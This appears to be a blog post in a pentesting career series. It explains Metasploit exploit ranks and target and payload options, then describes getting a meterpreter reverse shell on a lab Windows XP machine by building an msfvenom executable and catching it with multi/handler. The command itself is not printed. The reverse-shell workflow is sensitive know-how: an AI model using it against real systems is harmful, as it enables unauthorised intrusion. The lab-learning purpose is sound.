Tips for an Information Security Analyst/Pentester career - Ep. 34 - Metasploit: exploit options and msfvenom

In my previous post, I quickly showed what you can do with Metasploit, but now I want to show you its options in more detail.

If we select an exploit (we can pick whatever exploit, it's not relevant at this moment), we can dig deeper into its options.

Exploit information

The first thing we want to do is to have a look at what it does, through show info.  

Among the information displayed, a very important one is related to the exploit rank. 

The way exploits are assessed depends on what kind of impact they have on the victim machine.

I ended up choosing a Xampp exploit, rated as excellent. For an exploit to obtain such a rank, it's gonna have a very low profile, which means the victim machine must be never taken down and such exploit never causes a denial of service.

Targets and payloads

Once we selected an exploit, we can also customize our target and our payload, instead of having Metasploit automatically choose them for us.

In fact, if we happen to know what specific operating system version is running on the target machine, we can also determine the best suitable payload for our exploit.

To do this, while configuring the exploit options, we can simply run show targets or show payloads.

Exploitation

I attempted several exploits, to no avail.

I was doing that too quickly for the purposes of this tutorial, but this is a horrible pentesting approach.

That's not the way you do it.

You need to understand what each specific exploit does, how to use it, how to set up its options appropriately and how much noise you're making on the target machine.

So, you need to take all the time it needs.

That's a lesson I learned.

I was overconfident; I've been playing with this stuff for years and I thought that was an easy prey.

I mean, a Windows XP SP3 machine with the firewall turned off, that was a piece of cake.

I thought, "I got this".  I have exploited that before manually, so I thought it would be much easier with Metasploit.

I had to learn the hard way that you need to know much better each individual exploit, otherwise you go nowhere.

I was totally wasting my time and, would it have been a real engagement, I would have totally blown it up.

Humility, you never stop learning and I should know this better than anybody else.

Anyway, like I explained in a previous post, I never give up and so I attempted another solution: build a custom payload.

Custom payload with msfvenom

Other than using exploits already built and configured for you, you can use a special exploit available in Metasploit, called multi/handler, that allows to exploit a custom payload.

We can create such payload with a tool called msfvenom.  We can create several different files, such as executables, raw files, etc.

 I created an executable payload through the command shown below

I moved the executable to the Web server directory, in order to access it from the target machine through the web browser.

At this point, we need to configure our multi/handler exploit to pickup a reverse shell connection from the victim machine, when the infected executable is run.

We also need to set up a payload for this particular exploit, which will be the same as the one we used it to create our custom executable (windows/meterpreter/reverse_tcp).

Important notation: The options for the payload have to match the options we set up with msfvenom, otherwise we won't be able to get a shell.

In other words, LHOST and LPORT need to have the same values we included in our msfvenom payload.

As a matter of fact, I deliberately made a mistake in the video (which I invite you to check out for more details) to show this concept. I was unable to receive the connection back from the victim machine, because I had left LPORT as 4444 port TCP (its default value), instead of using port 1234, which was the value we were supposed to set up.

As soon as I corrected this mistake, I was able to pop up a shell.

I was also able to easily crack the passwords, as they were purposefully very weak.

Wrap-up

Like I already stated previously, Metasploit is a very powerful tool but it can lead to rely excessively on automated solutions.

I had to learn this concept the hard way.

Even on a very vulnerable machine, like the one I created based on Georgia Weidman's book, it doesn't always work.

Already knew this, but that's even clearer now. In my video, I only show a couple of failed attempts, but I went on that way for hours.

In a real-world pentest,  I would have completely screwed up.

So, the giveaway from all this is: don't rush it.

Make a good reconnaissance, get your information together, get your IP addresses, your system information, make sure you understand thoroughly what your target system/s are running and whether some specific vulnerabilities are applicable or not to that case.

In an upcoming post, I'm going to show you how you can use Metasploit to check whether a certain system is vulnerable to a specific exploit.  This can be done for some exploits only, but it's truly a time-saver, as you don't have to waste your time trying to hack the system in vain.

Hacking is a very painful road and it takes a lot of patience, resilience and determination to succeed, but more than anything it takes time.

Don't believe idiotic shows that depict the whole thing as a piece of cake, something that anybody can do.

It's a matter of mindset, other than skills, and I don't know if I have the right mindset myself.

But I know one thing for sure: that's all I want to do, so I'm not going to give up and I'll keep rolling over and over again until I get what I want.

So don't allow any setbacks from all this to stop you: you're supposed to fail, you need to and you need to do it quickly and repeatedly, and the more painfully it hurts the better.

Nothing worth achieving can be obtained without pain. If you like easy wins, this career path isn't for you.

You learn one step at a time, one failure at a time, through hours and hours banging your head against the wall until your head bleeds (gee, I'm getting too dramatic here, maybe, but you got the picture).

Episode 35

Episode 33